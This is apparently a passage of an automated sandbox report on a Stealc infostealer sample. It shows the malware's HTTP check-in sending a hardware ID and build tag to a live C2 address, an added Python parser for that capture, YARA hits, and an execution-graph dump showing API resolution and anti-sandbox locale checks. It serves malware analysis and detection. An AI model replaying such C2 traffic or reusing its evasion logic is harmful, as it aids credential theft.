Content-Type: multipart/form-data; boundary=----IDBAFHDGDGHDGCBFCFID
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 33 46 30 35 37 30 31 36 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes; two form fields, "hwid" and "build"):
------IDBAFHDGDGHDGCBFCFID
Content-Disposition: form-data; name="hwid"

EE3F0570167F2148772887
------IDBAFHDGDGHDGCBFCFID
Content-Disposition: form-data; name="build"

doma
------IDBAFHDGDGHDGCBFCFID--

Oct 7, 2024 23:23:07.564943075 CEST; 210 bytes; IN
HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 21:23:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64; decodes to the string "block"). No further HTTP request follows in the capture.
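The two messages above are the complete C2 exchange the sandbox saw, and a detection pipeline that wants the hardware ID and build tag has to parse the multipart body rather than grep the hex dump. The following Python is an added example, not code from this report or from the malware: the POST body and the 8-byte response are copied from the Data Raw fields above, the multipart parser is deliberately minimal (text fields only, no file parts, no nested multipart), and the handling of the response goes no further than base64-decoding it.

```python
import base64
import re
from typing import Dict

# Check-in POST of file.exe to 185.215.113.37 as printed in this report
# (multipart/form-data, Content-Length 211); bytes.fromhex ignores the spaces.
CONTENT_TYPE = "multipart/form-data; boundary=----IDBAFHDGDGHDGCBFCFID"
POST_BODY = bytes.fromhex(
    "2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 "
    "48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 "
    "65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a "
    "20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 "
    "3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 33 46 30 "
    "35 37 30 31 36 37 46 32 31 34 38 37 37 32 38 38 "
    "37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 "
    "47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 "
    "6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 "
    "6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e "
    "61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 "
    "6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 "
    "48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 2d "
    "2d 0d 0a"
)
# Response body the C2 returned to that POST, also copied from the report.
C2_RESPONSE_BODY = bytes.fromhex("59 6d 78 76 59 32 73 3d")


def parse_multipart(content_type: str, body: bytes) -> Dict[str, str]:
    """Return {field name: value} for a multipart/form-data body.

    Covers plain text fields only, which is all a check-in like this one carries.
    """
    m = re.search(r'boundary=("?)([^";\s]+)\1', content_type)
    if m is None:
        raise ValueError("Content-Type carries no boundary parameter")
    delimiter = b"--" + m.group(2).encode("ascii")
    fields: Dict[str, str] = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):
            break                                   # closing delimiter "--boundary--"
        head, sep, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("part has no header/body separator")
        name = re.search(rb'name="([^"]*)"', head)
        if name is None:
            raise ValueError("part has no name")
        # The CRLF in front of the next delimiter belongs to the delimiter, not to the value.
        if value.endswith(b"\r\n"):
            value = value[:-2]
        fields[name.group(1).decode("ascii")] = value.decode("utf-8", "replace")
    return fields


def decode_c2_response(body: bytes) -> str:
    """Decode the base64 text the C2 answers with; raises on malformed input."""
    return base64.b64decode(body, validate=True).decode("ascii")


def summarize_checkin(content_type: str, body: bytes, response: bytes) -> Dict[str, object]:
    """One record per check-in, the shape a hunting query would key on."""
    fields = parse_multipart(content_type, body)
    return {
        "hwid": fields.get("hwid"),
        "build": fields.get("build"),
        "content_length": len(body),
        "response": decode_c2_response(response),
    }


if __name__ == "__main__":
    for key, val in summarize_checkin(CONTENT_TYPE, POST_BODY, C2_RESPONSE_BODY).items():
        print(f"{key}: {val}")
```

The body length computed from the raw bytes matches the Content-Length header (211), which is a cheap sanity check that the hex in a report was transcribed completely before any fields are trusted.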


                                Target ID:0
                                Start time:17:23:02
                                Start date:07/10/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0xba0000
                                File size:1'853'440 bytes
                                MD5 hash:C6761F44BBAB998AF58149ACB8F7A920
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2152337269.0000000005100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:8%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:10.1%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:24
[execution_graph: the interactive node/edge rendering is not reproduced here. Recoverable from the graph's labelled nodes, in call order from the entry path: RtlAllocateHeap and VirtualProtect (ba45c0, called repeatedly from ba2260 and ba26a0); GetPEB, five LoadLibraryA calls and a series of GetProcAddress calls (bb9750, bb9a93; runtime import resolution); lstrcpy/lstrlen/lstrcat string helpers (bba740, bba7a0, bba820, bba8a0, bba9b0); GetSystemInfo with a branch to ExitProcess (ba1160); GetCurrentProcess and VirtualAllocExNuma with a branch to ExitProcess (ba1110); VirtualAlloc/VirtualFree (ba10a0); GlobalMemoryStatusEx followed by __aulldiv with a branch to ExitProcess (bb89b0, ba1249); GetUserDefaultLangID with five separate branches to ExitProcess (bb6770); GetProcessHeap/RtlAllocateHeap with GetUserNameA and GetComputerNameA (bb7850, bb78e0); GetSystemTime, sscanf and two SystemTimeToFileTime calls with a branch to ExitProcess (bb6920); OpenEventA, CreateEventA, CloseHandle and Sleep (bb6ac2 to bb6af5); GetWindowsDirectoryA (bb7500); InternetOpenA (ba4fb0). The check-then-ExitProcess chains are the code behind the "Found evasive API chain (may stop execution after checking locale)" and sandbox-detection signatures listed above.]
API calls 13998->13999 14000 ba29a2 13999->14000 14001 ba45c0 2 API calls 14000->14001 14002 ba29bb 14001->14002 14003 ba45c0 2 API calls 14002->14003 14004 ba29d4 14003->14004 14005 ba45c0 2 API calls 14004->14005 14006 ba29ed 14005->14006 14007 ba45c0 2 API calls 14006->14007 14008 ba2a06 14007->14008 14009 ba45c0 2 API calls 14008->14009 14010 ba2a1f 14009->14010 14011 ba45c0 2 API calls 14010->14011 14012 ba2a38 14011->14012 14013 ba45c0 2 API calls 14012->14013 14014 ba2a51 14013->14014 14015 ba45c0 2 API calls 14014->14015 14016 ba2a6a 14015->14016 14017 ba45c0 2 API calls 14016->14017 14018 ba2a83 14017->14018 14019 ba45c0 2 API calls 14018->14019 14020 ba2a9c 14019->14020 14021 ba45c0 2 API calls 14020->14021 14022 ba2ab5 14021->14022 14023 ba45c0 2 API calls 14022->14023 14024 ba2ace 14023->14024 14025 ba45c0 2 API calls 14024->14025 14026 ba2ae7 14025->14026 14027 ba45c0 2 API calls 14026->14027 14028 ba2b00 14027->14028 14029 ba45c0 2 API calls 14028->14029 14030 ba2b19 14029->14030 14031 ba45c0 2 API calls 14030->14031 14032 ba2b32 14031->14032 14033 ba45c0 2 API calls 14032->14033 14034 ba2b4b 14033->14034 14035 ba45c0 2 API calls 14034->14035 14036 ba2b64 14035->14036 14037 ba45c0 2 API calls 14036->14037 14038 ba2b7d 14037->14038 14039 ba45c0 2 API calls 14038->14039 14040 ba2b96 14039->14040 14041 ba45c0 2 API calls 14040->14041 14042 ba2baf 14041->14042 14043 ba45c0 2 API calls 14042->14043 14044 ba2bc8 14043->14044 14045 ba45c0 2 API calls 14044->14045 14046 ba2be1 14045->14046 14047 ba45c0 2 API calls 14046->14047 14048 ba2bfa 14047->14048 14049 ba45c0 2 API calls 14048->14049 14050 ba2c13 14049->14050 14051 ba45c0 2 API calls 14050->14051 14052 ba2c2c 14051->14052 14053 ba45c0 2 API calls 14052->14053 14054 ba2c45 14053->14054 14055 ba45c0 2 API calls 14054->14055 14056 ba2c5e 14055->14056 14057 ba45c0 2 API calls 14056->14057 14058 ba2c77 14057->14058 14059 ba45c0 2 API calls 14058->14059 14060 ba2c90 14059->14060 14061 ba45c0 2 API calls 
14060->14061 14062 ba2ca9 14061->14062 14063 ba45c0 2 API calls 14062->14063 14064 ba2cc2 14063->14064 14065 ba45c0 2 API calls 14064->14065 14066 ba2cdb 14065->14066 14067 ba45c0 2 API calls 14066->14067 14068 ba2cf4 14067->14068 14069 ba45c0 2 API calls 14068->14069 14070 ba2d0d 14069->14070 14071 ba45c0 2 API calls 14070->14071 14072 ba2d26 14071->14072 14073 ba45c0 2 API calls 14072->14073 14074 ba2d3f 14073->14074 14075 ba45c0 2 API calls 14074->14075 14076 ba2d58 14075->14076 14077 ba45c0 2 API calls 14076->14077 14078 ba2d71 14077->14078 14079 ba45c0 2 API calls 14078->14079 14080 ba2d8a 14079->14080 14081 ba45c0 2 API calls 14080->14081 14082 ba2da3 14081->14082 14083 ba45c0 2 API calls 14082->14083 14084 ba2dbc 14083->14084 14085 ba45c0 2 API calls 14084->14085 14086 ba2dd5 14085->14086 14087 ba45c0 2 API calls 14086->14087 14088 ba2dee 14087->14088 14089 ba45c0 2 API calls 14088->14089 14090 ba2e07 14089->14090 14091 ba45c0 2 API calls 14090->14091 14092 ba2e20 14091->14092 14093 ba45c0 2 API calls 14092->14093 14094 ba2e39 14093->14094 14095 ba45c0 2 API calls 14094->14095 14096 ba2e52 14095->14096 14097 ba45c0 2 API calls 14096->14097 14098 ba2e6b 14097->14098 14099 ba45c0 2 API calls 14098->14099 14100 ba2e84 14099->14100 14101 ba45c0 2 API calls 14100->14101 14102 ba2e9d 14101->14102 14103 ba45c0 2 API calls 14102->14103 14104 ba2eb6 14103->14104 14105 ba45c0 2 API calls 14104->14105 14106 ba2ecf 14105->14106 14107 ba45c0 2 API calls 14106->14107 14108 ba2ee8 14107->14108 14109 ba45c0 2 API calls 14108->14109 14110 ba2f01 14109->14110 14111 ba45c0 2 API calls 14110->14111 14112 ba2f1a 14111->14112 14113 ba45c0 2 API calls 14112->14113 14114 ba2f33 14113->14114 14115 ba45c0 2 API calls 14114->14115 14116 ba2f4c 14115->14116 14117 ba45c0 2 API calls 14116->14117 14118 ba2f65 14117->14118 14119 ba45c0 2 API calls 14118->14119 14120 ba2f7e 14119->14120 14121 ba45c0 2 API calls 14120->14121 14122 ba2f97 14121->14122 14123 ba45c0 2 API calls 14122->14123 
14124 ba2fb0 14123->14124 14125 ba45c0 2 API calls 14124->14125 14126 ba2fc9 14125->14126 14127 ba45c0 2 API calls 14126->14127 14128 ba2fe2 14127->14128 14129 ba45c0 2 API calls 14128->14129 14130 ba2ffb 14129->14130 14131 ba45c0 2 API calls 14130->14131 14132 ba3014 14131->14132 14133 ba45c0 2 API calls 14132->14133 14134 ba302d 14133->14134 14135 ba45c0 2 API calls 14134->14135 14136 ba3046 14135->14136 14137 ba45c0 2 API calls 14136->14137 14138 ba305f 14137->14138 14139 ba45c0 2 API calls 14138->14139 14140 ba3078 14139->14140 14141 ba45c0 2 API calls 14140->14141 14142 ba3091 14141->14142 14143 ba45c0 2 API calls 14142->14143 14144 ba30aa 14143->14144 14145 ba45c0 2 API calls 14144->14145 14146 ba30c3 14145->14146 14147 ba45c0 2 API calls 14146->14147 14148 ba30dc 14147->14148 14149 ba45c0 2 API calls 14148->14149 14150 ba30f5 14149->14150 14151 ba45c0 2 API calls 14150->14151 14152 ba310e 14151->14152 14153 ba45c0 2 API calls 14152->14153 14154 ba3127 14153->14154 14155 ba45c0 2 API calls 14154->14155 14156 ba3140 14155->14156 14157 ba45c0 2 API calls 14156->14157 14158 ba3159 14157->14158 14159 ba45c0 2 API calls 14158->14159 14160 ba3172 14159->14160 14161 ba45c0 2 API calls 14160->14161 14162 ba318b 14161->14162 14163 ba45c0 2 API calls 14162->14163 14164 ba31a4 14163->14164 14165 ba45c0 2 API calls 14164->14165 14166 ba31bd 14165->14166 14167 ba45c0 2 API calls 14166->14167 14168 ba31d6 14167->14168 14169 ba45c0 2 API calls 14168->14169 14170 ba31ef 14169->14170 14171 ba45c0 2 API calls 14170->14171 14172 ba3208 14171->14172 14173 ba45c0 2 API calls 14172->14173 14174 ba3221 14173->14174 14175 ba45c0 2 API calls 14174->14175 14176 ba323a 14175->14176 14177 ba45c0 2 API calls 14176->14177 14178 ba3253 14177->14178 14179 ba45c0 2 API calls 14178->14179 14180 ba326c 14179->14180 14181 ba45c0 2 API calls 14180->14181 14182 ba3285 14181->14182 14183 ba45c0 2 API calls 14182->14183 14184 ba329e 14183->14184 14185 ba45c0 2 API calls 14184->14185 14186 ba32b7 
14185->14186 14187 ba45c0 2 API calls 14186->14187 14188 ba32d0 14187->14188 14189 ba45c0 2 API calls 14188->14189 14190 ba32e9 14189->14190 14191 ba45c0 2 API calls 14190->14191 14192 ba3302 14191->14192 14193 ba45c0 2 API calls 14192->14193 14194 ba331b 14193->14194 14195 ba45c0 2 API calls 14194->14195 14196 ba3334 14195->14196 14197 ba45c0 2 API calls 14196->14197 14198 ba334d 14197->14198 14199 ba45c0 2 API calls 14198->14199 14200 ba3366 14199->14200 14201 ba45c0 2 API calls 14200->14201 14202 ba337f 14201->14202 14203 ba45c0 2 API calls 14202->14203 14204 ba3398 14203->14204 14205 ba45c0 2 API calls 14204->14205 14206 ba33b1 14205->14206 14207 ba45c0 2 API calls 14206->14207 14208 ba33ca 14207->14208 14209 ba45c0 2 API calls 14208->14209 14210 ba33e3 14209->14210 14211 ba45c0 2 API calls 14210->14211 14212 ba33fc 14211->14212 14213 ba45c0 2 API calls 14212->14213 14214 ba3415 14213->14214 14215 ba45c0 2 API calls 14214->14215 14216 ba342e 14215->14216 14217 ba45c0 2 API calls 14216->14217 14218 ba3447 14217->14218 14219 ba45c0 2 API calls 14218->14219 14220 ba3460 14219->14220 14221 ba45c0 2 API calls 14220->14221 14222 ba3479 14221->14222 14223 ba45c0 2 API calls 14222->14223 14224 ba3492 14223->14224 14225 ba45c0 2 API calls 14224->14225 14226 ba34ab 14225->14226 14227 ba45c0 2 API calls 14226->14227 14228 ba34c4 14227->14228 14229 ba45c0 2 API calls 14228->14229 14230 ba34dd 14229->14230 14231 ba45c0 2 API calls 14230->14231 14232 ba34f6 14231->14232 14233 ba45c0 2 API calls 14232->14233 14234 ba350f 14233->14234 14235 ba45c0 2 API calls 14234->14235 14236 ba3528 14235->14236 14237 ba45c0 2 API calls 14236->14237 14238 ba3541 14237->14238 14239 ba45c0 2 API calls 14238->14239 14240 ba355a 14239->14240 14241 ba45c0 2 API calls 14240->14241 14242 ba3573 14241->14242 14243 ba45c0 2 API calls 14242->14243 14244 ba358c 14243->14244 14245 ba45c0 2 API calls 14244->14245 14246 ba35a5 14245->14246 14247 ba45c0 2 API calls 14246->14247 14248 ba35be 14247->14248 
14249 ba45c0 2 API calls 14248->14249 14250 ba35d7 14249->14250 14251 ba45c0 2 API calls 14250->14251 14252 ba35f0 14251->14252 14253 ba45c0 2 API calls 14252->14253 14254 ba3609 14253->14254 14255 ba45c0 2 API calls 14254->14255 14256 ba3622 14255->14256 14257 ba45c0 2 API calls 14256->14257 14258 ba363b 14257->14258 14259 ba45c0 2 API calls 14258->14259 14260 ba3654 14259->14260 14261 ba45c0 2 API calls 14260->14261 14262 ba366d 14261->14262 14263 ba45c0 2 API calls 14262->14263 14264 ba3686 14263->14264 14265 ba45c0 2 API calls 14264->14265 14266 ba369f 14265->14266 14267 ba45c0 2 API calls 14266->14267 14268 ba36b8 14267->14268 14269 ba45c0 2 API calls 14268->14269 14270 ba36d1 14269->14270 14271 ba45c0 2 API calls 14270->14271 14272 ba36ea 14271->14272 14273 ba45c0 2 API calls 14272->14273 14274 ba3703 14273->14274 14275 ba45c0 2 API calls 14274->14275 14276 ba371c 14275->14276 14277 ba45c0 2 API calls 14276->14277 14278 ba3735 14277->14278 14279 ba45c0 2 API calls 14278->14279 14280 ba374e 14279->14280 14281 ba45c0 2 API calls 14280->14281 14282 ba3767 14281->14282 14283 ba45c0 2 API calls 14282->14283 14284 ba3780 14283->14284 14285 ba45c0 2 API calls 14284->14285 14286 ba3799 14285->14286 14287 ba45c0 2 API calls 14286->14287 14288 ba37b2 14287->14288 14289 ba45c0 2 API calls 14288->14289 14290 ba37cb 14289->14290 14291 ba45c0 2 API calls 14290->14291 14292 ba37e4 14291->14292 14293 ba45c0 2 API calls 14292->14293 14294 ba37fd 14293->14294 14295 ba45c0 2 API calls 14294->14295 14296 ba3816 14295->14296 14297 ba45c0 2 API calls 14296->14297 14298 ba382f 14297->14298 14299 ba45c0 2 API calls 14298->14299 14300 ba3848 14299->14300 14301 ba45c0 2 API calls 14300->14301 14302 ba3861 14301->14302 14303 ba45c0 2 API calls 14302->14303 14304 ba387a 14303->14304 14305 ba45c0 2 API calls 14304->14305 14306 ba3893 14305->14306 14307 ba45c0 2 API calls 14306->14307 14308 ba38ac 14307->14308 14309 ba45c0 2 API calls 14308->14309 14310 ba38c5 14309->14310 14311 ba45c0 2 
API calls 14310->14311 14312 ba38de 14311->14312 14313 ba45c0 2 API calls 14312->14313 14314 ba38f7 14313->14314 14315 ba45c0 2 API calls 14314->14315 14316 ba3910 14315->14316 14317 ba45c0 2 API calls 14316->14317 14318 ba3929 14317->14318 14319 ba45c0 2 API calls 14318->14319 14320 ba3942 14319->14320 14321 ba45c0 2 API calls 14320->14321 14322 ba395b 14321->14322 14323 ba45c0 2 API calls 14322->14323 14324 ba3974 14323->14324 14325 ba45c0 2 API calls 14324->14325 14326 ba398d 14325->14326 14327 ba45c0 2 API calls 14326->14327 14328 ba39a6 14327->14328 14329 ba45c0 2 API calls 14328->14329 14330 ba39bf 14329->14330 14331 ba45c0 2 API calls 14330->14331 14332 ba39d8 14331->14332 14333 ba45c0 2 API calls 14332->14333 14334 ba39f1 14333->14334 14335 ba45c0 2 API calls 14334->14335 14336 ba3a0a 14335->14336 14337 ba45c0 2 API calls 14336->14337 14338 ba3a23 14337->14338 14339 ba45c0 2 API calls 14338->14339 14340 ba3a3c 14339->14340 14341 ba45c0 2 API calls 14340->14341 14342 ba3a55 14341->14342 14343 ba45c0 2 API calls 14342->14343 14344 ba3a6e 14343->14344 14345 ba45c0 2 API calls 14344->14345 14346 ba3a87 14345->14346 14347 ba45c0 2 API calls 14346->14347 14348 ba3aa0 14347->14348 14349 ba45c0 2 API calls 14348->14349 14350 ba3ab9 14349->14350 14351 ba45c0 2 API calls 14350->14351 14352 ba3ad2 14351->14352 14353 ba45c0 2 API calls 14352->14353 14354 ba3aeb 14353->14354 14355 ba45c0 2 API calls 14354->14355 14356 ba3b04 14355->14356 14357 ba45c0 2 API calls 14356->14357 14358 ba3b1d 14357->14358 14359 ba45c0 2 API calls 14358->14359 14360 ba3b36 14359->14360 14361 ba45c0 2 API calls 14360->14361 14362 ba3b4f 14361->14362 14363 ba45c0 2 API calls 14362->14363 14364 ba3b68 14363->14364 14365 ba45c0 2 API calls 14364->14365 14366 ba3b81 14365->14366 14367 ba45c0 2 API calls 14366->14367 14368 ba3b9a 14367->14368 14369 ba45c0 2 API calls 14368->14369 14370 ba3bb3 14369->14370 14371 ba45c0 2 API calls 14370->14371 14372 ba3bcc 14371->14372 14373 ba45c0 2 API calls 
14372->14373 14374 ba3be5 14373->14374 14375 ba45c0 2 API calls 14374->14375 14376 ba3bfe 14375->14376 14377 ba45c0 2 API calls 14376->14377 14378 ba3c17 14377->14378 14379 ba45c0 2 API calls 14378->14379 14380 ba3c30 14379->14380 14381 ba45c0 2 API calls 14380->14381 14382 ba3c49 14381->14382 14383 ba45c0 2 API calls 14382->14383 14384 ba3c62 14383->14384 14385 ba45c0 2 API calls 14384->14385 14386 ba3c7b 14385->14386 14387 ba45c0 2 API calls 14386->14387 14388 ba3c94 14387->14388 14389 ba45c0 2 API calls 14388->14389 14390 ba3cad 14389->14390 14391 ba45c0 2 API calls 14390->14391 14392 ba3cc6 14391->14392 14393 ba45c0 2 API calls 14392->14393 14394 ba3cdf 14393->14394 14395 ba45c0 2 API calls 14394->14395 14396 ba3cf8 14395->14396 14397 ba45c0 2 API calls 14396->14397 14398 ba3d11 14397->14398 14399 ba45c0 2 API calls 14398->14399 14400 ba3d2a 14399->14400 14401 ba45c0 2 API calls 14400->14401 14402 ba3d43 14401->14402 14403 ba45c0 2 API calls 14402->14403 14404 ba3d5c 14403->14404 14405 ba45c0 2 API calls 14404->14405 14406 ba3d75 14405->14406 14407 ba45c0 2 API calls 14406->14407 14408 ba3d8e 14407->14408 14409 ba45c0 2 API calls 14408->14409 14410 ba3da7 14409->14410 14411 ba45c0 2 API calls 14410->14411 14412 ba3dc0 14411->14412 14413 ba45c0 2 API calls 14412->14413 14414 ba3dd9 14413->14414 14415 ba45c0 2 API calls 14414->14415 14416 ba3df2 14415->14416 14417 ba45c0 2 API calls 14416->14417 14418 ba3e0b 14417->14418 14419 ba45c0 2 API calls 14418->14419 14420 ba3e24 14419->14420 14421 ba45c0 2 API calls 14420->14421 14422 ba3e3d 14421->14422 14423 ba45c0 2 API calls 14422->14423 14424 ba3e56 14423->14424 14425 ba45c0 2 API calls 14424->14425 14426 ba3e6f 14425->14426 14427 ba45c0 2 API calls 14426->14427 14428 ba3e88 14427->14428 14429 ba45c0 2 API calls 14428->14429 14430 ba3ea1 14429->14430 14431 ba45c0 2 API calls 14430->14431 14432 ba3eba 14431->14432 14433 ba45c0 2 API calls 14432->14433 14434 ba3ed3 14433->14434 14435 ba45c0 2 API calls 14434->14435 
14436 ba3eec 14435->14436 14437 ba45c0 2 API calls 14436->14437 14438 ba3f05 14437->14438 14439 ba45c0 2 API calls 14438->14439 14440 ba3f1e 14439->14440 14441 ba45c0 2 API calls 14440->14441 14442 ba3f37 14441->14442 14443 ba45c0 2 API calls 14442->14443 14444 ba3f50 14443->14444 14445 ba45c0 2 API calls 14444->14445 14446 ba3f69 14445->14446 14447 ba45c0 2 API calls 14446->14447 14448 ba3f82 14447->14448 14449 ba45c0 2 API calls 14448->14449 14450 ba3f9b 14449->14450 14451 ba45c0 2 API calls 14450->14451 14452 ba3fb4 14451->14452 14453 ba45c0 2 API calls 14452->14453 14454 ba3fcd 14453->14454 14455 ba45c0 2 API calls 14454->14455 14456 ba3fe6 14455->14456 14457 ba45c0 2 API calls 14456->14457 14458 ba3fff 14457->14458 14459 ba45c0 2 API calls 14458->14459 14460 ba4018 14459->14460 14461 ba45c0 2 API calls 14460->14461 14462 ba4031 14461->14462 14463 ba45c0 2 API calls 14462->14463 14464 ba404a 14463->14464 14465 ba45c0 2 API calls 14464->14465 14466 ba4063 14465->14466 14467 ba45c0 2 API calls 14466->14467 14468 ba407c 14467->14468 14469 ba45c0 2 API calls 14468->14469 14470 ba4095 14469->14470 14471 ba45c0 2 API calls 14470->14471 14472 ba40ae 14471->14472 14473 ba45c0 2 API calls 14472->14473 14474 ba40c7 14473->14474 14475 ba45c0 2 API calls 14474->14475 14476 ba40e0 14475->14476 14477 ba45c0 2 API calls 14476->14477 14478 ba40f9 14477->14478 14479 ba45c0 2 API calls 14478->14479 14480 ba4112 14479->14480 14481 ba45c0 2 API calls 14480->14481 14482 ba412b 14481->14482 14483 ba45c0 2 API calls 14482->14483 14484 ba4144 14483->14484 14485 ba45c0 2 API calls 14484->14485 14486 ba415d 14485->14486 14487 ba45c0 2 API calls 14486->14487 14488 ba4176 14487->14488 14489 ba45c0 2 API calls 14488->14489 14490 ba418f 14489->14490 14491 ba45c0 2 API calls 14490->14491 14492 ba41a8 14491->14492 14493 ba45c0 2 API calls 14492->14493 14494 ba41c1 14493->14494 14495 ba45c0 2 API calls 14494->14495 14496 ba41da 14495->14496 14497 ba45c0 2 API calls 14496->14497 14498 ba41f3 
14497->14498 14499 ba45c0 2 API calls 14498->14499 14500 ba420c 14499->14500 14501 ba45c0 2 API calls 14500->14501 14502 ba4225 14501->14502 14503 ba45c0 2 API calls 14502->14503 14504 ba423e 14503->14504 14505 ba45c0 2 API calls 14504->14505 14506 ba4257 14505->14506 14507 ba45c0 2 API calls 14506->14507 14508 ba4270 14507->14508 14509 ba45c0 2 API calls 14508->14509 14510 ba4289 14509->14510 14511 ba45c0 2 API calls 14510->14511 14512 ba42a2 14511->14512 14513 ba45c0 2 API calls 14512->14513 14514 ba42bb 14513->14514 14515 ba45c0 2 API calls 14514->14515 14516 ba42d4 14515->14516 14517 ba45c0 2 API calls 14516->14517 14518 ba42ed 14517->14518 14519 ba45c0 2 API calls 14518->14519 14520 ba4306 14519->14520 14521 ba45c0 2 API calls 14520->14521 14522 ba431f 14521->14522 14523 ba45c0 2 API calls 14522->14523 14524 ba4338 14523->14524 14525 ba45c0 2 API calls 14524->14525 14526 ba4351 14525->14526 14527 ba45c0 2 API calls 14526->14527 14528 ba436a 14527->14528 14529 ba45c0 2 API calls 14528->14529 14530 ba4383 14529->14530 14531 ba45c0 2 API calls 14530->14531 14532 ba439c 14531->14532 14533 ba45c0 2 API calls 14532->14533 14534 ba43b5 14533->14534 14535 ba45c0 2 API calls 14534->14535 14536 ba43ce 14535->14536 14537 ba45c0 2 API calls 14536->14537 14538 ba43e7 14537->14538 14539 ba45c0 2 API calls 14538->14539 14540 ba4400 14539->14540 14541 ba45c0 2 API calls 14540->14541 14542 ba4419 14541->14542 14543 ba45c0 2 API calls 14542->14543 14544 ba4432 14543->14544 14545 ba45c0 2 API calls 14544->14545 14546 ba444b 14545->14546 14547 ba45c0 2 API calls 14546->14547 14548 ba4464 14547->14548 14549 ba45c0 2 API calls 14548->14549 14550 ba447d 14549->14550 14551 ba45c0 2 API calls 14550->14551 14552 ba4496 14551->14552 14553 ba45c0 2 API calls 14552->14553 14554 ba44af 14553->14554 14555 ba45c0 2 API calls 14554->14555 14556 ba44c8 14555->14556 14557 ba45c0 2 API calls 14556->14557 14558 ba44e1 14557->14558 14559 ba45c0 2 API calls 14558->14559 14560 ba44fa 14559->14560 
14561 ba45c0 2 API calls 14560->14561 14562 ba4513 14561->14562 14563 ba45c0 2 API calls 14562->14563 14564 ba452c 14563->14564 14565 ba45c0 2 API calls 14564->14565 14566 ba4545 14565->14566 14567 ba45c0 2 API calls 14566->14567 14568 ba455e 14567->14568 14569 ba45c0 2 API calls 14568->14569 14570 ba4577 14569->14570 14571 ba45c0 2 API calls 14570->14571 14572 ba4590 14571->14572 14573 ba45c0 2 API calls 14572->14573 14574 ba45a9 14573->14574 14575 bb9c10 14574->14575 14576 bb9c20 43 API calls 14575->14576 14577 bba036 8 API calls 14575->14577 14576->14577 14578 bba0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14577->14578 14579 bba146 14577->14579 14578->14579 14580 bba153 8 API calls 14579->14580 14581 bba216 14579->14581 14580->14581 14582 bba298 14581->14582 14583 bba21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14581->14583 14584 bba337 14582->14584 14585 bba2a5 6 API calls 14582->14585 14583->14582 14586 bba41f 14584->14586 14587 bba344 9 API calls 14584->14587 14585->14584 14588 bba428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14586->14588 14589 bba4a2 14586->14589 14587->14586 14588->14589 14590 bba4ab GetProcAddress GetProcAddress 14589->14590 14591 bba4dc 14589->14591 14590->14591 14592 bba515 14591->14592 14593 bba4e5 GetProcAddress GetProcAddress 14591->14593 14594 bba612 14592->14594 14595 bba522 10 API calls 14592->14595 14593->14592 14596 bba61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14594->14596 14597 bba67d 14594->14597 14595->14594 14596->14597 14598 bba69e 14597->14598 14599 bba686 GetProcAddress 14597->14599 14600 bb5ca3 14598->14600 14601 bba6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14598->14601 14599->14598 14602 ba1590 14600->14602 14601->14600 15723 ba1670 14602->15723 14605 bba7a0 lstrcpy 14606 ba15b5 14605->14606 14607 bba7a0 lstrcpy 14606->14607 14608 ba15c7 14607->14608 14609 bba7a0 lstrcpy 
